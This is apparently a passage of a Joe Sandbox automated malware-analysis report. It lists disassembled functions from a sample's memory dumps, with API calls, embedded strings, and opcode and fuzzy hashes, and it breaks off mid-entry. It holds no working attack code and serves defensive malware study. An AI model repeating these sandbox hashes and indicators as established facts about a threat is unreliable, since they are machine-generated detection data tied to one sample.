                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorExceptionException@8FrequencyLastPerformanceQueryRaiseThrowXinvalid_argumentstd::_
                                                                                          • String ID: Timer: QueryPerformanceFrequency failed with error
                                                                                          • API String ID: 2175244869-348333943
                                                                                          • Opcode ID: 2d1ceeda39102b6eccac9c841167c503a679f635fcd67d2fac36e44e1d6337b3
                                                                                          • Instruction ID: c5a6240617529b4f1db6b9f9eef34fc58a75aa8678af31162d46eace01b34197
                                                                                          • Opcode Fuzzy Hash: 2d1ceeda39102b6eccac9c841167c503a679f635fcd67d2fac36e44e1d6337b3
                                                                                          • Instruction Fuzzy Hash: 4B2119B250C780AFE310DF24C844B9BBBE8FB89614F504A1DF5A997281EB75D5048BA3
                                                                                          Function 6D036480 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 63COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __CxxThrowException@8.LIBCMT ref: 6D036518
                                                                                            • Part of subcall function 6D06AC75: RaiseException.KERNEL32(?,?,6D069C34,4E8A916F,?,?,?,?,6D069C34,4E8A916F,6D099C90,6D0AB974,4E8A916F), ref: 6D06ACB7
                                                                                          • __CxxThrowException@8.LIBCMT ref: 6D036558
                                                                                          Strings
                                                                                          • Cryptographic algorithms are disabled after a power-up self test failed., xrefs: 6D036527
                                                                                          • Cryptographic algorithms are disabled before the power-up self tests are performed., xrefs: 6D0364E7
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: Exception@8Throw$ExceptionRaise
                                                                                          • String ID: Cryptographic algorithms are disabled after a power-up self test failed.$Cryptographic algorithms are disabled before the power-up self tests are performed.
                                                                                          • API String ID: 3476068407-3345525433
                                                                                          • Opcode ID: cbad7a9ee6a653401f3debf8c511c6803fbdaf7af2917aabd5f2c97db8bd49b3
                                                                                          • Instruction ID: acdb77aaa958c9d1f260408b8492c6928d001e490e3a312c99e06f65ada08cfa
                                                                                          • Opcode Fuzzy Hash: cbad7a9ee6a653401f3debf8c511c6803fbdaf7af2917aabd5f2c97db8bd49b3
                                                                                          • Instruction Fuzzy Hash: 5221A87151C391AFF724DF74C440FABB3E8AB4A648F824A2DE74983181EB75D1048AA3
                                                                                          Function 6D03C120 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 52COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • std::_Xinvalid_argument.LIBCPMT ref: 6D03C14E
                                                                                            • Part of subcall function 6D0690D8: std::exception::exception.LIBCMT ref: 6D0690ED
                                                                                            • Part of subcall function 6D0690D8: __CxxThrowException@8.LIBCMT ref: 6D069102
                                                                                            • Part of subcall function 6D0690D8: std::exception::exception.LIBCMT ref: 6D069113
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
                                                                                          • String ID: gfff$gfff$vector<T> too long
                                                                                          • API String ID: 1823113695-3369487235
                                                                                          • Opcode ID: 83671152de3619f54471d61f39b2d46a92f18e10a0b06a6d15b6cd3302e92e81
                                                                                          • Instruction ID: f2ccfa5dcdce63622871a78fe46e55bc51a6cb632b40d3c80a34edbbeb13d3ce
                                                                                          • Opcode Fuzzy Hash: 83671152de3619f54471d61f39b2d46a92f18e10a0b06a6d15b6cd3302e92e81
                                                                                          • Instruction Fuzzy Hash: 9E01AD73F180361F8311997FED4055EEA8BAAC929571ACA3AE608DB349E531D80253C6
                                                                                          Function 6D0425D0 Relevance: 6.2, APIs: 4, Instructions: 206COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: _memmove$Exception@8Throw
                                                                                          • String ID:
                                                                                          • API String ID: 2655171816-0
                                                                                          • Opcode ID: d7f1d0b43d4bace7f6b47c73b92fe8c560a6d6b4bb0c9462ab0ec5637b00e904
                                                                                          • Instruction ID: 9cdf790af17a90611e2cdd03a8004565d93a14d989fbbf90021499d68904e87f
                                                                                          • Opcode Fuzzy Hash: d7f1d0b43d4bace7f6b47c73b92fe8c560a6d6b4bb0c9462ab0ec5637b00e904
                                                                                          • Instruction Fuzzy Hash: 7D5159753087068FE714DF68C990F2EB7EAABC8614F11892DE595C3340EB34E905CB92
                                                                                          Function 6D01D4B0 Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 6D069BB5: _malloc.LIBCMT ref: 6D069BCF
                                                                                          • std::exception::exception.LIBCMT ref: 6D01D5E4
                                                                                          • __CxxThrowException@8.LIBCMT ref: 6D01D5F9
                                                                                          • std::exception::exception.LIBCMT ref: 6D01D608
                                                                                          • __CxxThrowException@8.LIBCMT ref: 6D01D61D
                                                                                            • Part of subcall function 6D069BB5: std::exception::exception.LIBCMT ref: 6D069C04
                                                                                            • Part of subcall function 6D069BB5: std::exception::exception.LIBCMT ref: 6D069C1E
                                                                                            • Part of subcall function 6D069BB5: __CxxThrowException@8.LIBCMT ref: 6D069C2F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: std::exception::exception$Exception@8Throw$_malloc
                                                                                          • String ID:
                                                                                          • API String ID: 2621100827-0
                                                                                          • Opcode ID: 8f6bf27e665fa596f79912f75e2a5d07d1d231c32c940b21375bd1d4f7b5c468
                                                                                          • Instruction ID: 98e09d088aeabcc9335b2a41d8b3dc12dd300eda5976332cca7c60cf1b060d7b
                                                                                          • Opcode Fuzzy Hash: 8f6bf27e665fa596f79912f75e2a5d07d1d231c32c940b21375bd1d4f7b5c468
                                                                                          • Instruction Fuzzy Hash: 48514AB1A04649AFEB04CFA8C980B99FBF4FF08304F50866AD519D7B41D771E954CBA1
                                                                                          Function 6D025F00 Relevance: 6.1, APIs: 4, Instructions: 135COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 6D069BB5: _malloc.LIBCMT ref: 6D069BCF
                                                                                          • std::exception::exception.LIBCMT ref: 6D026035
                                                                                          • __CxxThrowException@8.LIBCMT ref: 6D02604A
                                                                                          • std::exception::exception.LIBCMT ref: 6D026059
                                                                                          • __CxxThrowException@8.LIBCMT ref: 6D02606E
                                                                                            • Part of subcall function 6D069BB5: std::exception::exception.LIBCMT ref: 6D069C04
                                                                                            • Part of subcall function 6D069BB5: std::exception::exception.LIBCMT ref: 6D069C1E
                                                                                            • Part of subcall function 6D069BB5: __CxxThrowException@8.LIBCMT ref: 6D069C2F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: std::exception::exception$Exception@8Throw$_malloc
                                                                                          • String ID:
                                                                                          • API String ID: 2621100827-0
                                                                                          • Opcode ID: c35aa53f2cbe814ae9644b77c08857a3c3a0a86f6c720c47bc8fdb13d5d56bdd
                                                                                          • Instruction ID: 24606fd317df852d7a6aa93564d3d4cc1433bc8ac671fc4f28c92c50dc10bec7
                                                                                          • Opcode Fuzzy Hash: c35aa53f2cbe814ae9644b77c08857a3c3a0a86f6c720c47bc8fdb13d5d56bdd
                                                                                          • Instruction Fuzzy Hash: A7516DB1A0464AAFD704CFA8C984B99FBF4FF09304F508269D519D7B41D771E914CBA1
                                                                                          Function 6D01DE50 Relevance: 6.1, APIs: 4, Instructions: 118COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: Variant$Clear$Init
                                                                                          • String ID:
                                                                                          • API String ID: 3740757921-0
                                                                                          • Opcode ID: 12b7db6a1cc2f527b2146d0527c18241e92ce747d2ef336df71e77ec4f437a17
                                                                                          • Instruction ID: 9b00d56c98e9fb2272c27ce95cbbe6ee04b23e33b0da3f90fe091e841e3e46cb
                                                                                          • Opcode Fuzzy Hash: 12b7db6a1cc2f527b2146d0527c18241e92ce747d2ef336df71e77ec4f437a17
                                                                                          • Instruction Fuzzy Hash: DD418A322082419FE700DF69C840B5AB7E9FFDA710F048A6DF9449B350E735E905CBA2
                                                                                          Function 6D025DB0 Relevance: 6.1, APIs: 4, Instructions: 115COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 6D069BB5: _malloc.LIBCMT ref: 6D069BCF
                                                                                          • std::exception::exception.LIBCMT ref: 6D025E87
                                                                                          • __CxxThrowException@8.LIBCMT ref: 6D025E9C
                                                                                          • std::exception::exception.LIBCMT ref: 6D025EAB
                                                                                          • __CxxThrowException@8.LIBCMT ref: 6D025EC0
                                                                                            • Part of subcall function 6D069BB5: std::exception::exception.LIBCMT ref: 6D069C04
                                                                                            • Part of subcall function 6D069BB5: std::exception::exception.LIBCMT ref: 6D069C1E
                                                                                            • Part of subcall function 6D069BB5: __CxxThrowException@8.LIBCMT ref: 6D069C2F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: std::exception::exception$Exception@8Throw$_malloc
                                                                                          • String ID:
                                                                                          • API String ID: 2621100827-0
                                                                                          • Opcode ID: 9accf2abf7e89cf459ace7465afdf24179b145e28029c25449f2723a13eb60ad
                                                                                          • Instruction ID: 1a9f71d0b27ae5e95d3ce30e1155e734940742a148faa22112952193125c4ed4
                                                                                          • Opcode Fuzzy Hash: 9accf2abf7e89cf459ace7465afdf24179b145e28029c25449f2723a13eb60ad
                                                                                          • Instruction Fuzzy Hash: 704138B19047489FE720CFA8D980B9AFBF4FB08314F40896ED59A97B41E771E504CBA5
                                                                                          Function 6D01D360 Relevance: 6.1, APIs: 4, Instructions: 115COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 6D069BB5: _malloc.LIBCMT ref: 6D069BCF
                                                                                          • std::exception::exception.LIBCMT ref: 6D01D437
                                                                                          • __CxxThrowException@8.LIBCMT ref: 6D01D44C
                                                                                          • std::exception::exception.LIBCMT ref: 6D01D45B
                                                                                          • __CxxThrowException@8.LIBCMT ref: 6D01D470
                                                                                            • Part of subcall function 6D069BB5: std::exception::exception.LIBCMT ref: 6D069C04
                                                                                            • Part of subcall function 6D069BB5: std::exception::exception.LIBCMT ref: 6D069C1E
                                                                                            • Part of subcall function 6D069BB5: __CxxThrowException@8.LIBCMT ref: 6D069C2F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: std::exception::exception$Exception@8Throw$_malloc
                                                                                          • String ID:
                                                                                          • API String ID: 2621100827-0
                                                                                          • Opcode ID: 3154d450d4dc7b1d7829435b3afa30111cab53123ba3bd5954b76e2d49a45958
                                                                                          • Instruction ID: c4252354dd315391df33db395d48f273a28be6f89737dfdbaa9a75ce380390b5
                                                                                          • Opcode Fuzzy Hash: 3154d450d4dc7b1d7829435b3afa30111cab53123ba3bd5954b76e2d49a45958
                                                                                          • Instruction Fuzzy Hash: 874137B19047589FD720CFA9D980B9ABBF4FB08304F40896ED99A97B41E771E504CBA1
                                                                                          Function 6D062B80 Relevance: 6.1, APIs: 4, Instructions: 112COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 6D036480: __CxxThrowException@8.LIBCMT ref: 6D036518
                                                                                            • Part of subcall function 6D036480: __CxxThrowException@8.LIBCMT ref: 6D036558
                                                                                            • Part of subcall function 6D069BB5: _malloc.LIBCMT ref: 6D069BCF
                                                                                          • std::exception::exception.LIBCMT ref: 6D062C9A
                                                                                          • __CxxThrowException@8.LIBCMT ref: 6D062CB1
                                                                                          • std::exception::exception.LIBCMT ref: 6D062CC3
                                                                                          • __CxxThrowException@8.LIBCMT ref: 6D062CDA
                                                                                            • Part of subcall function 6D069BB5: std::exception::exception.LIBCMT ref: 6D069C04
                                                                                            • Part of subcall function 6D069BB5: std::exception::exception.LIBCMT ref: 6D069C1E
                                                                                            • Part of subcall function 6D069BB5: __CxxThrowException@8.LIBCMT ref: 6D069C2F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: Exception@8Throw$std::exception::exception$_malloc
                                                                                          • String ID:
                                                                                          • API String ID: 3942750879-0
                                                                                          • Opcode ID: 1862284f7cf2dc40dbcadf1ca1044b04f0e3e97d732156fad671726b90abbc23
                                                                                          • Instruction ID: 503652221f9725ace9b424d0e6a4c4bca3a189ef87d91fca520f6554909d2cc4
                                                                                          • Opcode Fuzzy Hash: 1862284f7cf2dc40dbcadf1ca1044b04f0e3e97d732156fad671726b90abbc23
                                                                                          • Instruction Fuzzy Hash: 3C4169B15187419FD314CF68C880A5AFBF4FF99314F508A2EF29A87691D7B0A504CBA2
                                                                                          Function 6D02C410 Relevance: 6.1, APIs: 4, Instructions: 112COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6D02C478
                                                                                          • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6D02C488
                                                                                          • SafeArrayGetElement.OLEAUT32(?,00000001,?), ref: 6D02C4B4
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02C512
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: ArraySafe$Bound$DestroyElement
                                                                                          • String ID:
                                                                                          • API String ID: 3987547017-0
                                                                                          • Opcode ID: 84656c55fb329f1c8e260b71c471d7c069bbb9423300a3157def5f59e9070c04
                                                                                          • Instruction ID: cd41ed88f8e121de28cfecb7e7cf99ceadea5ce1a0b799319a57ced8c60544ec
                                                                                          • Opcode Fuzzy Hash: 84656c55fb329f1c8e260b71c471d7c069bbb9423300a3157def5f59e9070c04
                                                                                          • Instruction Fuzzy Hash: 41411C75A0514AAFDF00DF98C884EAEB7B9FB49350F10C569F919E7240D730EA45CBA4
                                                                                          Function 6D02B580 Relevance: 6.1, APIs: 4, Instructions: 111COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • VariantInit.OLEAUT32(6D0802A0), ref: 6D02B5D5
                                                                                          • VariantInit.OLEAUT32(?), ref: 6D02B5E2
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D02B685
                                                                                          • VariantClear.OLEAUT32(6D0802A0), ref: 6D02B68B
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: Variant$ClearInit
                                                                                          • String ID:
                                                                                          • API String ID: 2610073882-0
                                                                                          • Opcode ID: 838fbab041dd06cbda79667aba77fe318cebce9510603c2249bc49099a5d3457
